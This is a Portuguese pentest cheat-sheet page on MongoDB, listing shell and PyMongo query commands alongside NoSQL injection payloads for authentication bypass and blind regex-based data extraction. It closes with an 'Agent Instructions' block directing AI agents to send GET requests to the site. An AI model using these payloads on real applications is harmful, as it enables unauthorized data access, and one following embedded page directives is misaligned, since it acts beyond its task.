# MongoDB No banco de dados não relacional MongoDB, os injections tem a mesma lógica dos banco relacionais (em termos de injections), porém com sintaxes diferentes. Por exemplo, o MySQL usa o injection `' or 1=1 --` enquanto o MongoDB usa `|| 1==1` ou `[{"$gt":""}]` que diz para nos retornar o que for maior que null, ou seja, tudo. {% hint style="info" %} **DICA**: Podemos saber se determinado campo existe em uma Collection inserindo a condição `&& this.password` . {% endhint %} ### Comandos Básicos | **COMANDO** | **DESCRIÇÃO** | | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------- | | `mongo` | Conecta ao banco de dados local | | `mongo ` / `mongo --host ` | Conecta ao banco de dados remoto | | `show dbs` | Exibe os databases. `admin`, `config` e `local` são utilizadas pelo próprio MongoDB | | `use ` | Seleciona um database | | `show collections` | Exibe as Collections do Database atual | | `db..find()` | Exibe as informações de uma determinada Collection. Por padrão exibe 20 registros, digite `it` para mostrar mais registros. | | `db..find().count()` | Exibe a quantidade de registros em uma determinada Collection | | `db..find().limit()` | Retorna uma determinada quantidade de registros | | `db..find({"": ""})` | Filtrando por campo que tenha determinado valor | | `db..find({"": {$gt: ""})` | Filtrando por campo que tenha um valor maior que o determinado | | `db..find({$and: [{"": ""}, {"": ""}]})` | Filtrando com a condição `AND` | | `db..find({$or: [{"": ""}, {"": ""}]})` | Filtrando com a condição `OR` | |

db.\.find({"\": {$regex: "ˆABC.*"}})

db.\.find({"\": {$regex: "ABC.*"}}).count()

| Filtra por todas os registros de determinada key que começam com "ABC" | | `db..find().sort({"": 1}).skip(100).limit(1)` | Ordenando por determinado, exibindo a partir da linha 100 e exibindo apenas o primeiro resultado | | `db..aggregate({"$group": {"_id": null, avg: {$avg: "$"}}})` | Exibindo média de valores | #### ### NoSQL Injection Ao fazer um injection para trazer todos os dados, semelhante a um `' or '1'='1`, primeiro manipule o campo chave via Burp Suite ou via GET (caso esteja disponível), seguindo o seguinte padrão: ```bash # Requisição original http://site.com.br/?name=mysther # Requisição com NoSQL Injection http://site.com.br/?name[$ne]=null http://site.com.br/?name={$ne:null}&password={$ne:null} http://site.com.br/?name={$ne:null}&password='||''==' http://site.com.br/?name=admin&password='||''==' http://site.com.br/?name[$ne]=nullpassword='||''==' ``` ### ### Blind NoSQL Semelhante ao processo de Blind SQL, o Blind NoSQL também e um processo manual bastante maçante.\ Supondo que temos uma vulnerabilidade que nos permite injectar comandos no MongoDB, podemos utilizar o seguinte payload: ``` ' && this..match(/^.*$/)%00 ``` Caso no retorne positivo, o sistema web irá continuar trazendo os resultados normalmente e caso negativo, não irá retorna dados quaisquer. Caso retorne ok, altere o payload para o seguinte modelo: ``` ' && this..match(/^.*$/)%00 ``` Depois disso continue fazendo esse processo até finalizar a string que deseja buscar. ### ### PyMongo ```bash #!/usr/bin/python from pymongo import MongoClient client = MongoClient('localhost', 27017) # Listando os databases print client.database_names() # Listando as Collections de uma determinada Database print client[''].collection_names() # Retornando o valor dp primeiro registro de uma determinada Collection print client['']..find_one() # Verificando a quantidade de registros de uma Collection print client['']..find().count() print client['']..find().count(True) # WHERE com uma condição print client['']..find_one({"": ""}) # WHERE com duas condições "AND" + count print client['']..find({"$and": [{"": ""}, {"": ""}]}).count() # WHERE com duas condições "OR" + count print client['']..find({"$or": [{"": ""}, {"": ""}]}).count() # Ordenando o resultado em ordem alfabética e retornado o seu sétimo registro print client['']..find().sort('', 1)[7] # Média de valores list(client['']..aggregate([{"$match": {"": ""}}, {"$group": {"_id": "$", "avg": {"$avg": "$"}}}])) ``` ### ### Sites ``` https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html https://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html https://www.owasp.org/images/e/ed/GOD16-NOSQL.pdf ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mysther.gitbook.io/knowledge-base/ataques/web-exploitation/injections/sql-injection/mongodb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.